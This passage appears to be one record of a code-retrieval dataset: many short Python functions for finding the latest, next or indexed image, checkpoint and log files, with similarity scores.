\n # This ensures that the image queue does not reset if the Pola restarts.\n try: \n f = open(\"memoryIndex.txt\", 'r')\n self._currentIndex = int((f.read()))\n f.close()\n except: \n self._currentIndex = -1\n \n self._currentIndex = (self._currentIndex + 1) % len(self._images)\n \n f = open(\"memoryIndex.txt\", 'w')\n f.write(str(self._currentIndex))\n f.close()\n \n \n # If there is an internet connection, go online. If not, get the \"no wifi error\"- image queue\n try:\n urllib.request.urlopen('http://torabodin.com/')\n try: \n imageName = self._api.downloadImage(self._currentIndex)\n print(1, imageName)\n self._image= self.loadImage(imageName, True)\n print (self._image)\n \n except: \n self._image = self.getNextImage()\n \n except:\n self._image = self.loadImage(None, False)\n \n \n return self._image", "def findfigure(name):\n found = None\n if \".\" in name:\n if os.path.exists(name):\n found = name\n elif \".\" not in name:\n for suffix in (\".pdf\", \".eps\", \".ps\", \".JPG\", \".jpg\", \".png\"):\n testfile = name + suffix\n if os.path.exists(testfile):\n found = testfile\n if found is None:\n raise RuntimeError(\"Could not find image file {}\".format(name))\n return found, os.path.splitext(found)[-1]", "def get_latest_image(dirpath, valid_extensions=('jpg','jpeg','png')):\n global processed\n f = True\n valid_files = [os.path.join(dirpath, filename) for filename in os.listdir(dirpath)]\n new_files = [z for z in valid_files if not z in processed]\n processed.extend(new_files)\n #print(new_files,'\\n',processed)\n return new_files\n '''valid_files = [f for f in valid_files if '.' in f and f.rsplit('.',1)[-1] in valid_extensions and os.path.isfile(f)]\n if not valid_files:\n f = True\n else:\n f = False\n return max(valid_files, key=os.path.getmtime)'''", "def get_last_file(base_dir, pattern):\n base_dir = Path(base_dir)\n\n return sorted(base_dir.glob(pattern),\n key=lambda x: x.stat().st_ctime, reverse=True)[0]", "def _get_latest_chapter(self, directory):\n files = os.listdir(directory)\n if files:\n print(\"Last saved chapter: \", files[-1])\n last_chapter = files[-1][:-4]\n return self.indices.get(last_chapter, -1)\n return -1", "def get_imageId_from_fileName(filename):\n filename = os.path.splitext(filename)[0]\n if filename.isdigit():\n return int(filename)\n return id_iter", "def get_imageId_from_fackmask(filename):\n filename = os.path.splitext(filename)[0]\n regex = re.compile(r'\\d+')\n iid = regex.search(filename).group(0)\n image_id = int(iid)\n if filename.isdigit():\n return int(filename)\n return image_id", "def displayImage():\n f = open(os.path.join(\"outputColor\",\"epoch_total.txt\"),\"r\")\n epochNum = int(f.readline())\n f.close()\n return Image.open(\"outputPhotosColor/image_at_epoch_{:04d}.png\".format(epochNum))", "def next_image(self):\n return self.images.pop()", "def get_next_image(self):\n raise NotImplementedError", "def get_image_name_for_hook(module):\n os.makedirs(INSTANCE_FOLDER, exist_ok=True)\n base_name = str(module).split('(')[0]\n index = 0\n image_name = '.' # '.' 
is surely exist, to make first loop condition True\n while os.path.exists(image_name):\n index += 1\n image_name = os.path.join(\n INSTANCE_FOLDER, '%s_%d.png' % (base_name, index))\n return image_name", "def getLast(self):\n if self.last != None:\n return self.last.filename\n else:\n return None", "def get_next_cid(self) -> str:\n self.position += 1\n return \"img{}\".format(self.position)", "def find_step(self):\n for p in enumerate(self.get_decoder_paths()):\n full_path = p[1] + \".data-00000-of-00001\"\n file = Path(full_path)\n if not file.exists():\n return p[0]\n\n return -1", "def get_imageId_from_fileName(filename, id_iter):\n filename = os.path.splitext(filename)[0]\n if filename.isdigit():\n return int(filename)\n return id_iter", "def sort_key(path):\n file_end = path.rsplit(os.sep,1)[1]\n file_number = file_end.rstrip('.tif')\n return int(file_number)", "def fetch_last_model_file(self):\n try:\n filename = self.model_files[-1]\n return self.make_path(filename)\n except IndexError:\n return None", "def _find_tif_file(self):\n name = self.results_file.name[:-12] + \".tif\"\n try:\n tif_file = next(self.results_file.parent.glob(name))\n return tif_file\n except StopIteration:\n print(f\"Tif not found for {name}\")\n return None", "def most_recent_image(self, shape):\n size = np.array(shape).prod()\n arr = np.ascontiguousarray(np.zeros(size, dtype=np.int32))\n self.lib.GetMostRecentImage(arr.ctypes.data_as(ct.POINTER(ct.c_int32)),\n ct.c_ulong(size))\n return arr.reshape(shape)", "def last_segment(self):\n\t\tseg_sort = sorted(self.segments, key=lambda x: stringutil.extract_numbers(x.filename))\n\t\tif seg_sort:\n\t\t\treturn seg_sort[-1]\n\t\telse:\n\t\t\treturn None", "def image_path_from_index(self, index):\n for ext in self._image_ext:\n image_path = os.path.join(self._data_path, 'Images',\n index + ext)\n if os.path.exists(image_path):\n break\n assert os.path.exists(image_path), \\\n 'Path does not exist: {}'.format(image_path)\n\treturn image_path", "def get_latest_valid_picture(self):\n return self.buffer[self.buffer_index]", "def logdir():\n listdir = [xx for xx in os.listdir(\"runs/\") if os.path.isdir(os.path.join(\"runs\", xx))]\n\n max_ = 0\n for i in range(len(listdir)):\n try:\n filename = int(listdir[i])\n if max_ < filename:\n max_ = filename\n except ValueError:\n continue\n\n return str(max_ + 1)", "def findReferenceImage(modelfile):\n\n try:\n\n dirname = op.dirname(modelfile)\n prefixes = [getFIRSTPrefix(modelfile)]\n except ValueError:\n return None\n\n if prefixes[0].endswith('_first'):\n prefixes.append(prefixes[0][:-6])\n\n for p in prefixes:\n try:\n return fslimage.addExt(op.join(dirname, p), mustExist=True)\n except fslimage.PathError:\n continue\n\n return None", "def get_latest_revision(directory):\n latest_revision_found = -1\n for bench_file in os.listdir(directory):\n file_name_match = re.match('bench_r(\\d+)_(\\S+)', bench_file)\n if (file_name_match is None):\n continue\n revision = int(file_name_match.group(1))\n if revision > latest_revision_found:\n latest_revision_found = revision\n if latest_revision_found < 0:\n return None\n else:\n return latest_revision_found", "def image(images):\n return images[0]", "def get_last_framenumber(self):\n return self._frame_number", "def _get_latest_checkpoint_number(cls, checkpoints_dir):\n nums = cls._checkpoint_numbers(checkpoints_dir)\n if len(nums) == 0:\n return None\n else:\n return max(nums)", "def get_last_sprite(self) -> pygame.Surface:\n return self.__animation_dict[self.__animation_key][-1]", 
"def parse_image_id(image_ref):\n temp = image_ref.rsplit('/')\n #Return the last item, which is the image id\n return temp[len(temp) - 1]", "def image_path_at(self, i):\n return self.image_path_from_index(self._image_index[i])", "def image_path_at(self, i):\n return self.image_path_from_index(self._image_index[i])", "def search_up_img(self, next_partial_imgs_del):\n for img in next_partial_imgs_del:\n next = self.get_next_img(img) # if img is the last of the list the next returned is the first\n if next not in next_partial_imgs_del:\n return next", "def getLastFile(self):\n lastFile = None if len(self.recentFiles) == 0 else self.recentFiles[0]\n self.setLastPath(lastFile)\n return lastFile", "def get_filepath(image):\r\n extension = (len(image.split('/')[-1:][0]))\r\n return image[:-extension]", "def get_file_name(image_dir, image_name_prefix, current_count):\n if imageNumOn:\n # you could also use os.path.join to construct image path file_path\n file_path = image_dir+ \"/\"+image_name_prefix+str(current_count)+\".jpg\"\n else:\n right_now = datetime.datetime.now()\n file_path = (\"%s/%s%04d%02d%02d-%02d%02d%02d.jpg\"\n % (image_dir, image_name_prefix,\n right_now.year, right_now.month, right_now.day,\n right_now.hour, right_now.minute, right_now.second))\n return file_path", "def lastDigit(barcode):\r\n lastnumber = int(barcode[-1])\r\n return lastnumber", "def available_images_index(self):\n first = ct.c_long()\n last = ct.c_long()\n self.lib.GetNumberAvailableImages(ct.pointer(first), ct.pointer(last))\n\n return (first.value, last.value)", "def get_last_revision(filename):\n files = glob.glob(os.path.join(settings.INTERNET_DRAFT_ARCHIVE_DIR,filename) + '-??.txt')\n if files:\n sorted_files = sorted(files)\n return get_revision(sorted_files[-1])\n else:\n raise Exception('last revision not found in archive')", "def get_random_base():\n\n n_base = count_raw_img('base')\n img = \"{}.jpg\".format(random.randint(1, n_base + 1))\n return Image.open(RAW_DIR_PATH['base'] + img)", "def image_to_index(filename):\n return _image2image(filename)", "def __goToLastPage(self):\n try:\n self.currenturi = self.__baseuri + self.soup.find('li', \\\n 'lia-component-pagesnumbered').findAll('a', text=re.compile\\\n ('^\\d+$'))[-1].parent['href'].split(';')[0]\n self.__setSoupForCurrentUri()\n except:\n log.info(self.log_msg('Last page cannot find from the given page no \\\n for url %s'%self.task.instance_data['uri']))", "def get_last_time_step(dir):\n\n return str(max([fd for fd in listdir(dir) if fd.isnumeric()]))", "def get_last_id(statefile):\r\n\r\n debug_print('Getting last ID from %s' % (statefile,))\r\n try:\r\n f = open(statefile,'r')\r\n id = int(f.read())\r\n f.close()\r\n except IOError:\r\n debug_print('IOError raised, returning zero (0)')\r\n return 0\r\n debug_print('Got %d' % (id,))\r\n return id", "def get_img_index(pred_result: List) -> List:\n img_index = []\n\n for i, line in enumerate(pred_result):\n match = re.search(\"\\./test_pics/\", line)\n if match:\n img_index.append(i)\n if i == len(pred_result) - 1:\n img_index.append(i)\n return img_index", "def getFrameNumber(fileName, jointNumber):\n with open(fileName) as f:\n for i, l in enumerate(f):\n pass\n return (i+1)//jointNumber", "def latestShotNumber():\n\tconn = _mds.Connection(_pref._HBT_SERVER_ADDRESS+':8003');\n\tshot_num = conn.get('current_shot(\"hbtep2\")')\n\treturn int(shot_num)", "def calculting_name():\n\n list_of_files = glob.glob('./muestras/*') # * means all if need specific format then *.csv\n latest_file = 
max(list_of_files, key=os.path.getctime)\n _, name_file = os.path.split(latest_file)\n name, _ = os.path.splitext(name_file)\n name_number = str(name)\n\n return name_number", "def get_last_page_num(page):\n start_link = page.find('<div class=\"pagenav\"')\n if start_link == -1:\n return None\n start_quote = page.find('>Page', start_link)\n end_quote = page.find('</td>', start_quote)\n end_num = long(page[start_quote + 11:end_quote])\n return end_num", "def get_current_prediction_output_path(prediction_output_base_path: str, image_name: str) -> str:\n dirs = [(prediction_output_base_path + d) for d in os.listdir(prediction_output_base_path)]\n newest_dir = max(dirs, key=os.path.getmtime)\n return newest_dir + '/' + image_name.replace('/', '')", "def wiki_image(pagetext):\n images = [i for i in pagetext.images if i not in EXCLUDED_IMAGES]\n if len(images) > 0:\n return images[0]\n else:\n return ''", "def get_last_game_id():\n\t\ttry:\n\t\t\tf = open(game_id_file, 'r')\n\t\t\tid = int(f.read())\n\t\t\tf.close()\n\t\texcept IOError:\n\t\t\tprint('IOError raised, returning zero (0)')\n\t\t\treturn 0\n\t\treturn id", "def get_image(id_num):\n return sqldb.get_image(id_num)", "def get_new_image(self):\n return self.vid_mem_reader.get_latest_image()[0]", "def get_nth_filepath(self, n):\n return self.get_filepaths()[n] if n < len(self.get_filepaths()) else None", "def image_path_at(self, i):\n image_path = os.path.join(self._image_path, self._image_index[i])\n assert os.path.exists(image_path), \\\n 'Path does not exist: {}'.format(image_path)\n return image_path", "def get_filename(img_path):\n filename = os.path.splitext(img_path)\n return os.path.basename(filename[0])", "def get_remaining_images(elastix_output_dir):\n reg_imgs = glob.glob(os.path.join(elastix_output_dir, \"reg_image_*\"))\n n_reg_imgs = len(reg_imgs)\n #mov_imgs = glob.glob(os.path.join(moving_image_dir, \"*.tif\"))\n #n_mov_imgs = len(mov_imgs)\n return n_reg_imgs", "def last_index(self) -> int:\n return self._last_index", "def image_path_at(self, i):\n return self.image_path_from_index(self.image_index[i])", "def find_last_step(dbpath):\n #~ if not isinstance(dbpath,OdbType):\n odb = openOdb(path=dbpath)\n _steps = odb.steps.keys()\n last_step = _steps[-1]\n # odb.close() <- This failed\n return last_step", "def _find_last_numeric_subdir(self):\n existing_subdirs = os.walk(self.base_data_dir).next()[1]\n \n # Remove any subdirs which contain alphabetic characters\n numeric_subdirs = [subdir for subdir in existing_subdirs \n if not any(char.isalpha() for char in subdir)]\n\n if numeric_subdirs:\n numeric_subdirs.sort()\n return numeric_subdirs[-1]", "def get_image_name(folder, row, column, w_n):\n image_names = get_image_names(folder)\n img_name = \"\"\n column = str(column).zfill(2)\n s_re = re.compile(r\"{}{}_w{}\".format(row, column, w_n))\n for img in image_names:\n if re.search(s_re, img) is not None:\n img_name = img\n break\n if img_name == \"\":\n return None\n folder += img_name\n return folder", "def advance_image():\n # pylint: disable=global-statement\n global current_image\n if current_image is not None:\n current_image += 1\n if current_image is None or current_image >= len(file_list):\n current_image = 0\n load_image()", "def lastPath(self, toNative=True):\n return self.paths(toNative=toNative)[-1]", "def get_last_number(s:str):\n array = re.findall(r'[0-9]+', s)\n if array.__len__() is 0:\n return -1\n return int(array[-1])", "def load_next_image(self):\n # Did we finish an epoch?\n if self._cur == 
len(self.indexlist):\n self._cur = 0\n shuffle(self.indexlist)\n\n # Load an image\n index = self.indexlist[self._cur] # Get the image index\n # Load and prepare ground truth\n multilabel = np.zeros(20).astype(np.int32)\n anns = load_pascal_annotation(index, self.pascal_root)\n for label in anns['gt_classes']:\n # in the multilabel problem we don't care how MANY instances\n # there are of each class. Only if they are present.\n # The \"-1\" is b/c we are not interested in the background\n # class.\n multilabel[label - 1] = 1\n\n self._cur += 1\n return index, multilabel", "def get_prefix() :\n \n import glob\n filenames = glob.glob(picture_folder+'*.jpg')\n max_prefix = 0\n for filename in filenames :\n parts = filenames.split('_')\n if len(parts) > 1 :\n possible_prefix = parse_int(parts[0])\n if possible_prefix > max_prefix :\n max_prefix = possible_prefix\n \n max_prefix += 1\n return '%04d' % max_prefix", "def get_recent_images(num_images=30):\n folder = app.config['UPLOAD_FOLDER']\n\n init_image_info()\n\n # get list of last modified images - ignore .json file and files start with .\n files = ['/'.join((folder, file)) \\\n for file in os.listdir(folder) if ('json' not in file) \\\n and not (file.startswith('.')) ]\n\n # list of tuples (file_path, timestamp)\n last_modified_files = [(file, os.path.getmtime(file)) for file in files]\n print(last_modified_files)\n last_modified_files = sorted(last_modified_files,\n key=lambda t: t[1], reverse=True)\n num_stored_images = len(last_modified_files)\n\n # build a list of image information\n image_stats = []\n\n print(\"THE NUMBER OF STORED IMAGES IS: {}\".format(num_stored_images))\n\n if num_stored_images != 0:\n\n # read in image info\n with open(IMAGE_INFO_JSON, 'r') as f:\n info = json.load(f)\n\n for i, f in enumerate(last_modified_files):\n # set limit for rendering pictures\n if i > num_images: break\n\n path, filename = f[0], f[0].replace(folder, '').replace('/', '')\n cur_image_info = info.get(filename, {})\n\n print(\"CURRENT IMAGE INFO IS: {}\".format(cur_image_info))\n\n img = {\n 'path': path,\n 'labels': cur_image_info\n }\n print(\"CURRENT IMG LABEL DATA IS: {}\".format(img['labels']))\n image_stats.append(img)\n\n return image_stats, num_stored_images", "def get_binary_image_name(folder, row, column):\n image_names = get_image_names(folder)\n img_name = \"\"\n column = str(column).zfill(2)\n s_re = re.compile(r\"{}{}\".format(row, column))\n for img in image_names:\n if re.search(s_re, img) is not None:\n img_name = img\n break\n if img_name == \"\":\n return None\n folder += img_name\n return folder", "def get_image_ref() -> str:\n images_rq = request(\n method=\"GET\", url=app.config[\"IMAGE_REF\"], headers=build_header(),\n )\n if not images_rq.ok:\n HTTPError(f\"Can not get image id for virtual machine: {images_rq.status_code}\")\n\n [image] = images_rq.json()[\"images\"]\n return image[\"id\"]", "def remove_extra_images(path_to_images: str, number_of_images: int) -> None:\n last_image = 'image' + str(number_of_images) + '.jpg'\n while last_image in listdir(path_to_images):\n last_image_path = path.join(path_to_images, last_image)\n remove(last_image_path)\n print(f\"remove {last_image}\")\n number_of_images += 1\n last_image = 'image' + str(number_of_images) + '.jpg'", "def get_last_file(log_dir):\n last_date = 0\n last_ext = \"\"\n last_filename = \"\"\n FileInfo = namedtuple('FileInfo', 'path date ext')\n file_mask = r\"^nginx-access-ui\\.(log-(\\d{8})$|log-(\\d{8}).gz$)\"\n try:\n for file in os.listdir(log_dir):\n 
match = re.search(file_mask, file)\n if match:\n try:\n file_date = match.group(1).split(\"-\")[1].split('.')\n if int(file_date[0]) > last_date:\n last_date = int(file_date[0])\n try:\n last_ext = match.group(1).split('.')[1]\n except:\n last_ext = ''\n last_filename = match.group(0)\n except:\n pass\n except:\n MAIN_LOGGER.error(\"No such directory %s\", log_dir)\n return None\n\n if not last_filename:\n MAIN_LOGGER.info(\"no files to parse\")\n return None\n\n MAIN_LOGGER.info(\"got last file\")\n return FileInfo(os.path.join(os.path.dirname(__file__), log_dir, last_filename),\n str(last_date), last_ext)", "def state(self):\n return self.last_image", "def locateImageOnScreen(ImageName):\n location = pyautogui.locateOnScreen(ImageName) \n try: \n for x in location:\n return location\n except:\n sys.exit('The image could not be found in the active screen. \\n'+'Stopping program.')" ]
[ "0.7381124", "0.71163946", "0.6752403", "0.65669954", "0.651449", "0.6455671", "0.6257701", "0.62144595", "0.61207634", "0.6083774", "0.60167074", "0.6005787", "0.5981818", "0.59797287", "0.5971447", "0.597075", "0.59043884", "0.5898508", "0.58921754", "0.5875937", "0.581396", "0.5812782", "0.57936674", "0.57638973", "0.5762741", "0.5760847", "0.57509756", "0.57318723", "0.5723892", "0.5679276", "0.5674129", "0.56514424", "0.56298864", "0.5594666", "0.5594367", "0.5570788", "0.5568176", "0.5553805", "0.5546389", "0.5541378", "0.5539164", "0.55365556", "0.55156547", "0.5505156", "0.550112", "0.5499522", "0.5498924", "0.5493709", "0.5464193", "0.5460812", "0.54534763", "0.54521334", "0.5451145", "0.5445272", "0.5442534", "0.54397446", "0.54397446", "0.54360324", "0.5435996", "0.54342103", "0.5431329", "0.5431326", "0.54271144", "0.5426188", "0.5420813", "0.54093957", "0.54066586", "0.53927433", "0.538995", "0.53898734", "0.538018", "0.53793395", "0.5369004", "0.5368942", "0.5365227", "0.5363314", "0.53601295", "0.5357875", "0.5356099", "0.53540593", "0.53524095", "0.53485227", "0.5346489", "0.53411895", "0.53396684", "0.53381836", "0.5328591", "0.530909", "0.53074056", "0.530715", "0.5297787", "0.52776945", "0.52773345", "0.52762735", "0.5274947", "0.5271646", "0.5267805", "0.52612025", "0.52556103", "0.52555853" ]
0.7685043
0
Sends an exposure command to the CCD given the type of frame and exposure time. The received BLOB is of FITS type and is saved to a FITS file.
def exposure(frameType, expTime): blobEvent.clear() # set the specified frame type if frameType.lower() == 'light': ccd_frame[0].s = PyIndi.ISS_ON ccd_frame[1].s = PyIndi.ISS_OFF ccd_frame[2].s = PyIndi.ISS_OFF ccd_frame[3].s = PyIndi.ISS_OFF indiclient.sendNewSwitch(ccd_frame) elif frameType.lower() == 'bias': ccd_frame[0].s = PyIndi.ISS_OFF ccd_frame[1].s = PyIndi.ISS_ON ccd_frame[2].s = PyIndi.ISS_OFF ccd_frame[3].s = PyIndi.ISS_OFF indiclient.sendNewSwitch(ccd_frame) elif frameType.lower() == 'dark': ccd_frame[0].s = PyIndi.ISS_OFF ccd_frame[1].s = PyIndi.ISS_OFF ccd_frame[2].s = PyIndi.ISS_ON ccd_frame[3].s = PyIndi.ISS_OFF indiclient.sendNewSwitch(ccd_frame) elif frameType.lower() == 'flat': ccd_frame[0].s = PyIndi.ISS_OFF ccd_frame[1].s = PyIndi.ISS_OFF ccd_frame[2].s = PyIndi.ISS_OFF ccd_frame[3].s = PyIndi.ISS_ON indiclient.sendNewSwitch(ccd_frame) # set the value for the next exposure ccd_exposure[0].value=expTime indiclient.sendNewNumber(ccd_exposure) # wait for the exposure blobEvent.wait() for blob in ccd_ccd1: # pyindi-client adds a getblobdata() method to IBLOB item # for accessing the contents of the blob, which is a bytearray in Python image_data=blob.getblobdata() # write the byte array out to a FITS file global imgNum global imgName imgNum += 1 fileName = fileDir+'raw-'+str(imgNum).zfill(8)+'.fits' f = open(fileName, 'wb') f.write(image_data) f.close() imgName = fileName return fileName
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def expose(self, cmd, expTime, expType):\n\n if not expType:\n expType = 'test'\n if cmd:\n cmd.inform('exposureState=\"exposing\"')\n if expType not in ('bias', 'test') and expTime > 0:\n time.sleep(expTime + self._exposureOverheadTime())\n\n if cmd:\n cmd.inform('exposureState=\"reading\"')\n\n f = pyfits.open('/home/chyan/mhs/data/mcs/schmidt_fiber_snr400_rmod71.fits')\n image = f[0].data\n # image = numpy.random.normal(self.biasLevel,\n # scale=self.readNoise,\n # size=self.imageSize).astype('u2')\n\n if expType != 'test':\n time.sleep(self._readoutTime())\n return image", "def tcs_exposure_request(image_type, duration = 0, number = 1):\n\n\tvalid_types = ['THERMAL','DARK', 'BIAS', 'FLAT','OBJECT']\n\tvalid = image_type in valid_types\n\n\tif valid:\n\t\timage_type = image_type.lower()\n\t\tif image_type == 'dark':\n\t\t\timage_type = 'thermal'\n\n\t\tif number < 1:\n\t\t\tlogger.error('Invalid number of exposures requested')\n\t\t\trespond = set_err_codes.STATUS_CODE_EXPOSURE_NOT_STARTED\n\t\t\treturn respond\n\n\t\tif duration <0:\n\t\t\tlogger.error('Invalid exposure time requested')\n\t\t\trespond = set_err_codes.STATUS_CODE_EXPOSURE_NOT_STARTED\n\t\t\treturn respond\n\n\t\tcommand_str = 'expose ' + image_type\n\t\tif number != 1:\n\t\t\tcommand_str += ' '+str(number)\n\t\tif image_type != 'bias':\n\t\t\tcommand_str += ' ' + str(duration)\n\t\t\n\t\ttry:\n\t\t\ttcs_respond = send_command(command_str)\n\t\t\n\t\texcept:\n\t\t\trespond = set_err_codes.STATUS_CODE_EXPOSURE_NOT_STARTED\n\t\telse:\n\t\t\t\n\t\t\tcam_temp = get_camera_status()[2]\n\t\t\t#if good_response and cam_temp>-20:\n\t\t\tif float(cam_temp)>-20:\n\t\t\t\trespond = set_err_codes.STATUS_CODE_CCD_WARM\n\t\n\t\t\telse:\n\t\t\t\trespond = set_err_codes.STATUS_CODE_OK\n\t\t\t\n\t\treturn respond\n\n\telse:\n\t\tlogger.error('Invalid image type provided to exposure request '+str(\n\t\t\t\timage_type))\n\t\tprint('Invalid image type provided to exposure request'+str(\n\t\t\timage_type))", "def expose(self, cmd):\n\n expType = cmd.cmd.keywords[0].name\n if expType in ('bias', 'test'):\n expTime = 0.0\n else:\n expTime = cmd.cmd.keywords[\"expTime\"].values[0]\n\n filename, image = self._doExpose(cmd, expTime, expType)\n cmd.finish('exposureState=done')", "def _doExpose(self, cmd, expTime, expType):\n \n image = self.actor.camera.expose(cmd, expTime, expType)\n filename = self.getNextFilename(cmd)\n pyfits.writeto(filename, image, checksum=False, clobber=True)\n cmd.inform(\"filename=%s\" % (qstr(filename)))\n \n return filename, image", "def exp(self, exposure_time):\n print(f\"exp: {exposure_time}\")\n self.device_control.exposure = exposure_time\n yield", "def Exposure(self, time):\r\n IS_EXPOSURE_CMD_SET_EXPOSURE = 12 #there is a whole list to implement\r\n TIME = DOUBLE(time)\r\n nSizeOfParam = 8\r\n CALL('Exposure', self, \r\n UINT(IS_EXPOSURE_CMD_SET_EXPOSURE), \r\n byref(TIME), \r\n UINT(nSizeOfParam))", "def expose(self):\n if self.camera is None: # test mode -- immediately return test image\n print(\"NO SPECTRAL CAMERA FOUND -- USING TEST DATA\")\n self.filename = \"example_fits_files/Mooi\"\n return\n\n exposure_time = self.time.get()\n try:\n self.exposure_time = float(exposure_time)\n except:\n message = \"Exposure time \\\"{0}\\\" cannot be converted to floating point number\".format(exposure_time)\n messagebox.showerror(\"Error\", message)\n raise ValueError(message)\n filename = \"spectra/{0}\".format(timestamp())\n self.camera.spectrum(self.exposure_time, filename)\n self.filename = filename", "def 
set_exposure(self, exposure):\n self.logger.info(f'Setting exposure to {exposure}')\n self._driver.ExposureTime.SetValue(exposure)", "def setExposureTime(self, cmd, expTime):\n\n pass", "def command(self, value):\n for ii in range(0, len(exposure_mode_names)):\n if value == exposure_mode_names[ii]: break\n self.tcp_comms.tcp_params.exposureMode = ii\n self.tcp_comms.send_exposure_mode(self.tcp_comms.tcp_params.exposureMode)", "def Expose(self, fitsfile, seconds=5):\n # make sure the file has good name\n if not fitsfile.endswith('.fits'):\n fitsfile += '.fits'\n tstamp = datetime.now().strftime('_%y%m%d-%H%M')\n match = re.match(r'.*(_\\d\\d\\d\\d\\d\\d-\\d\\d\\d\\d)\\.fits', fitsfile)\n if not match:\n fitsfile = fitsfile[:-5] + tstamp + '.fits'\n elif match.group(1) != tstamp:\n fitsfile = fitsfile[:-17] + tstamp + '.fits'\n \n fitsfile = path.join(self.datapath, fitsfile)\n\n self.lastfile = fitsfile\n log.info(\"Starting new exposure, filename=%s\",\n path.basename(self.lastfile))\n args = ['./CCDDExposeDB.py', str(seconds), fitsfile, \n self.outputMetadata]\n if self.lastimgpath:\n args.append(self.lastimgpath)\n return self._run(args, \n env=dict(IMAGEDB_URI=self.imagedb_uri,\n IMAGEDB_COLLECTION=self.imagedb_collection)\n )", "def expose(self):\n\n ## Determine type of exposure (exp, series, stack)\n exptype = str(self.exptypeComboBox.currentText())\n mode = self.modedict[exptype]\n\n ## Get exposure parameters\n if mode == \"bias\":\n exptime = 0.0\n else:\n exptime = self.exptimeSpinBox.value()\n imcount = self.imstackSpinBox.value()\n seqnum = self.imnumSpinBox.value()\n mintime = self.minexpSpinBox.value()\n maxtime = self.maxexpSpinBox.value()\n step = self.tstepSpinBox.value()\n\n ## Determine filter kwargs\n if self.filterToggleButton.isChecked():\n kwargs = {'filter_name' : str(self.filterComboBox.currentText())}\n else:\n kwargs = {'monowl' : self.monoSpinBox.value()}\n\n if self.testimCheckBox.isChecked():\n title = 'test'\n else:\n title = str(self.imtitleLineEdit.text())\n\n ## Build filepath\n filepath = os.path.join(str(self.imfilenameLineEdit.text()),title)\n \n ## Check if single exposure\n if exptype in [\"Exposure\", \"Dark\", \"Bias\"]:\n\n ## Perform exposure\n self.logger.info(\"Starting {0}s {1} image.\".format(exptime, exptype))\n self.image_start.emit(1)\n\n try:\n filename = exposure.im_acq(mode, filepath, exptime, seqnum, **kwargs)\n self.image_taken.emit(1)\n except subprocess.CalledProcessError:\n self.logger.exception(\"Error in executable {0}_acq. Image not taken.\".format(mode))\n except OSError:\n self.logger.exception(\"Executable {0}_acq not found. Image not taken\".format(mode))\n except IOError:\n self.logger.exception(\"File already exits. 
Image not taken.\")\n else:\n self.logger.info(\"Exposure {0} finished successfully.\".format(filename))\n self.seqnum_inc.emit(seqnum)\n subprocess.Popen(['ds9', '-mosaicimage', 'iraf', filename,\n '-zoom', 'to', 'fit', '-cmap', 'b'])\n\n ## Check if a stack of exposures of same type\n elif exptype in [\"Exposure Stack\", \"Dark Stack\", \"Bias Stack\"]:\n\n total = seqnum + imcount\n self.logger.info(\"Starting {0}s {1} stack.\".format(exptime, exptype))\n self.image_start.emit(imcount)\n\n try:\n for i in range(seqnum, total):\n self.logger.info(\"Starting image {0} of {1}.\".format(i+1-seqnum, imcount))\n filename = exposure.im_acq(mode, filepath, exptime, i, **kwargs)\n self.logger.info(\"Exposure {0} finished successfully.\".format(filename))\n self.image_taken.emit(i+1-seqnum)\n self.seqnum_inc.emit(i)\n except subprocess.CalledProcessError:\n self.logger.exception(\"Error in executable {0}_acq. Image not taken.\".format(mode))\n except OSError:\n self.logger.exception(\"Executable {0}_acq not found. Image not taken.\".format(mode))\n except IOError:\n self.logger.exception(\"File already exists. Image not taken.\")\n else:\n self.logger.info(\"Exposure stack finished successfully.\")\n subprocess.Popen(['ds9', '-mosaicimage', 'iraf', filename, '-zoom', 'to', 'fit', '-cmap', 'b'])\n \n ## Check if a series of exposures of increase exposure time\n elif exptype in [\"Exposure Series\", \"Dark Series\"]:\n\n ## Parameter checks\n if mintime > maxtime:\n self.logger.warning(\"Minimum time must be less than Maximum time. Series not started.\")\n return\n elif step <= 0:\n self.logger.warning(\"Time step must be greater than 0. Series not started.\")\n return\n\n ## Construct array of exposure times\n t = mintime\n time_array = []\n while t <= maxtime:\n time_array.append(t)\n t += step\n \n ## Perform series\n self.logger.info(\"Starting {0} series with mintime {1}, maxtime {2}, and step {3}.\".format(exptype, mintime, maxtime, step))\n self.image_start.emit(len(time_array))\n \n try:\n for i, time in enumerate(time_array):\n self.logger.info(\"Starting {0}s {1} image.\".format(time, mode))\n filename = exposure.im_acq(mode, filepath, time, seqnum, **kwargs)\n self.logger.info(\"Exposure {0} finished successfully.\".format(filename))\n self.image_taken.emit(i+1)\n except subprocess.CalledProcessError:\n self.logger.exception(\"Error in executable {0}_acq. Image not taken.\".format(mode))\n except OSError:\n self.logger.exception(\"Executable {0}_acq not found. Image not taken.\".format(mode))\n except IOError:\n self.logger.exception(\"File already exists. 
Image not taken.\")\n else:\n self.logger.info(\"Exposure series finished successfully.\")\n subprocess.Popen(['ds9', '-mosaicimage', 'iraf', filename, '-zoom', 'to', 'fit', '-cmap', 'b'])\n self.seqnum_inc.emit(seqnum)", "async def integrate(self, exposure_time=1):\n if not self.status == ControllerStatus.IDLE:\n raise ArchonError(\"Status must be IDLE to start integrating.\")\n\n await self.set_param(\"IntMS\", int(exposure_time * 1000))\n await self.set_param(\"Exposures\", 1)\n\n self.status = ControllerStatus.EXPOSING", "def __init__(self, exposure_time, img_acq_rate, EM_gain, name='iXon Ultra 897', img_acq_type='emcdd', darkfield=None, binning=None,\n vertical_pixel_shift_speed=0.5e-6, horizontal_pixel_shift_speed=0.1e-6, horizontal_pixel_shift_rate_bits=14,\n frame_transfer=True, crop_mode=False, acquisition_mode='kinetic', triggering='internal', readout_mode='image',\n pixels=512, pixel_size=16e-6):\n self.name = name\n self.img_acq_type = img_acq_type\n\n self.exposure_time = exposure_time\n self.img_acq_rate = img_acq_rate\n self.em_gain = EM_gain\n self.darkfield = darkfield\n self.binning = binning\n\n # supporting camera acquisition settings\n self.vpss = vertical_pixel_shift_speed\n self.hpss = horizontal_pixel_shift_speed\n self.hpss_bits = horizontal_pixel_shift_rate_bits\n self.frame_transfer = frame_transfer\n self.crop_mode = crop_mode\n self.acquisition_mode = acquisition_mode\n self.triggering = triggering\n self.readout_mode = readout_mode\n\n if isinstance(pixels, int):\n self.pixels = (pixels, pixels)\n else:\n self.pixels = pixels\n self.pixel_size = pixel_size\n self.image_area = (self.pixels[0]*pixel_size, self.pixels[1]*pixel_size)", "def factor_exposure(asset: Asset, risk_model_id: str, factor_name: str, *,\n source: str = None, real_time: bool = False, request_id: Optional[str] = 